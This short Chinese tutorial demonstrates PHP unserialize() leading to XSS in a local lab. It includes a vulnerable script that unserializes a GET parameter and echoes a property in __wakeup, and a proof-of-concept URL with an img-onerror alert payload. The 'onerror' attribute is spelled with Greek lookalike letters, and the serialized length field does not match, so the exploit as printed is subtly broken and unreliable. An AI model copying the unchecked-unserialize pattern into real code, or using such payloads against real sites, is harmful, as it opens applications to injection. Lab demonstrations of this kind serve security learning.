环境搭建phpstudy
序列化代码如下
<?php
class A{
var $test = "<img src=1 οnerrοr=alert(1)>";
function __wakeup(){
echo $this->test;
}
}
$b = new A();
$c = serialize($b);
echo $c;
?>
测试效果
反序列化代码如下
<?php
class A{
function __wakeup(){
echo $this->test;
}
}
$a = $_GET['test'];
$a_unser = unserialize($a);
?>
访问的poc
http://localhost/demo.php?test=O:1:"A":1:{s:4:"test";s:28:"<img src=1 οnerrοr=alert(1)>";}
完结